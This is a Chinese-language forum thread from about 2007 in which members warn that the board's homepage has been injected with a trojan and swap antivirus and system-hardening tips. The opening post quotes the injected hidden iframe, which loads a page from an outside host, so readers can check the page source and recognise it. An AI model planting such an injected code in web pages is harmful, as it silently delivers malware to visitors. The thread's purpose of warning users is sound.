A4S

进入圣域

(事隔已久,烦请管理员锁帖)最近论坛的木马还没清干净,如果你的杀软不好用,告诉大

前几天中马后一度正常,今天又看到不只一位兄弟说中招(我这边也是),如果你的杀毒软件没有报告,并不表明没事,提醒大家:

在进入A4S/BBS首页后,如果杀软没有报警,用IE菜单中的查看——查看源文件这一项,如果在第一行有这样一行字
<iframe src=http://51731006.com/admin/95.htm width=20 height=0 frameborder=0></iframe>

这就表明论坛又被黑了,即便你的杀软没有报,但木马可能还是悄悄潜进你的电脑,所以就请暂时离开吧,为了你的资料安全

希望大家都有防范意识,不要被木马咬到

谢谢提醒   一直 在注意     一直没有

是非常落后病毒,都半年多了。这两天开一次,报一次。

下面是病毒参数:http://securityresponse.symantec ... 2007-033008-3019-99

我的杀毒软件也没有提醒…………不过我会注意的…………
PS:不知道大家用的都是哪种杀毒软件?

谢谢提醒,现在马上去查查看看哦 [s:11]  [s:11]  [s:11]

能够说明一下这个病毒的具体危害么? [s:10]  [s:16]

卡巴  360    瑞星  AVAST    也就用个这些   前段用AVAST
  原先都是裸奔的....

发现,MS只有进首页会有马,所以直接不要从首页进来吧,也表去首页 [s:11]

<p>
引用第7楼shcshc2007-10-28 17:37发表的: 卡巴 360   瑞星 AVAST   也就用个这些   前段用AVAST 原先都是裸奔的&#46;&#46;&#46;&#46;
</p><p>我刚开始用的是瑞星2008体验版,然后又换成金山2007,现在是卡巴基斯+360安全卫士+Windows Defender+费尔个人防火墙(专业般)…… 应该够安全了…………</p>

之前用卡巴太占資源
現在改用NOD
.............

MS已經沒有毒了

引用第9楼冰龙hyolon2007-10-29 08:44发表的:
我刚开始用的是瑞星2008体验版,然后又换成金山2007,现在是卡巴基斯+360安全卫士+Windows Defender+费尔个人防火墙(专业般)…… 应该够安全了…………

不知你是不是用路由猫,如果不是,我比你还多这一道(路由猫一般有内建的防火墙规则,能阻挡一些网络攻击);即便是,我还有最后一重杀手锏:还原精灵,就像网吧那样,重启就还原,所以岂止不怕病毒,我没事还帮别人测病毒呢 [s:9]

但即便如此,我这种号称到“武装到牙齿”的OS(噢对了还有三招——在WINDOWS的管理工具中手动屏蔽掉了几个局域网中病毒传播的高危端口,关掉不必要的远程服务,以及自编批处理文件,去掉WINDOWS根目录的默认共享),几年前还是被黑了一次,心有余悸。。。所以,小心没大错,才是王道啊~~~~~
引用第10楼abow7222007-10-29 09:44发表的:
之前用卡巴太占資源
現在改用NOD
.............

MS已經沒有毒了

我和你一样,但就连供职于NOD32中国部的工程师朋友自己都承认,NOD32对于国内的“土产”病毒,查杀能力并不强,好像病毒库做的不是太全吧,我也曾遇到过朋友的瑞星查出的毒,我的NOD32一声没吭。。。所以最好用NOD同时,能搞个别的绿色版的杀软,定期扫扫硬盘,不要太迷信NOD~~~

引用第11楼qdqidao2007-10-29 18:47发表的:

我和你一样,但就连供职于NOD32中国部的工程师朋友自己都承认,NOD32对于国内的“土产”病毒,查杀能力并不强,好像病毒库做的不是太全吧,我也曾遇到过朋友的瑞星查出的毒,我的NOD32一声没吭。。。所以最好用NOD同时,能搞个别的绿色版的杀软,定期扫扫硬盘,不要太迷信NOD~~~
还原固然好,但是每次重启动都还原,那不是什么都不能安装了呀!

<p>
引用第11楼qdqidao2007-10-29 18:47发表的: <font size=\"2\">不知你是不是用路由猫,如果不是,我比你还多这一道(路由猫一般有内建的防火墙规则,能阻挡一些网络攻击);即便是,我还有最后一重杀手锏:还原精灵,就像网吧那样,重启就还原,所以岂止不怕病毒,我没事还帮别人测病毒呢</font>
</p><p>如果还原精灵也算的话……那我还有一键GHOST和联想电脑拯救系统……当然我把Administration帐户也禁用了,自己重新再建一个管理员帐号并且不定时修改密码,共享也全部取消了……</p>

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?进入圣域

x

再好的安全系统,没有安全意识等于0!
有个很经典的例子:一个公司电脑上安全系统作的铜墙铁壁,一般人难以攻入。可桌子上却有电话机。结果就是号称铜墙体壁的系统完全无用,因为拨号上网不走你那边就等于没有。

安全意识才是最重要的,可很多却很弱。

今天发现机器确实有点问题了,网络盘没有响应了.... [s:16]

引用第11楼qdqidao2007-10-29 18:47发表的:

那是不是真得要裝卡巴啊.....................你建議哪一個殺毒軟體

正常运行很久了,没出过问题。。。
就是最近论坛时常打不开,好象也不止我一个的

晕,最近论坛一直都没事啊,这么久的帖子也被顶上来~~~还是请管理员锁了吧,毕竟挂马事件已经过去好久了呢,我这帖还留在第一页,容易给菜鸟造成恐慌,汗